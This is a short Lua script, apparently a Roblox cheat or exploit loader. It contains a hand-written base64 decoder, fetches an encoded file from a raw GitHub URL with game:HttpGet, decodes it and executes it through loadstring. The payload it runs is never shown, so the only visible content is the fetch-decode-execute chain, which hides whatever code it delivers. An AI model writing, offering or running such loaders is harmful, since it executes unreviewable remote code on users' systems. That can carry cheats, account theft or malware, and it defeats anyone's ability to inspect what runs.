local url = "https://raw.githubusercontent.com/Naki202/AHST2/refs/heads/main/small.txt"

-- Base64 Decode
local function decodeBase64(data)
    local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    
    data = data:gsub('[^' .. b .. '=]', '')

    return (data:gsub('.', function(x)
        if x == '=' then
            return ''
        end

        local r, f = '', (b:find(x) - 1)

        for i = 6, 1, -1 do
            r = r .. (f % 2^i - f % 2^(i - 1) > 0 and '1' or '0')
        end

        return r
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
        if #x ~= 8 then
            return ''
        end

        local c = 0

        for i = 1, 8 do
            if x:sub(i, i) == '1' then
                c = c + 2^(8 - i)
            end
        end

        return string.char(c)
    end))
end

-- Load encoded script
local encoded = game:HttpGet(url)

-- Decode
local decoded = decodeBase64(encoded)

-- Run
loadstring(decoded)()
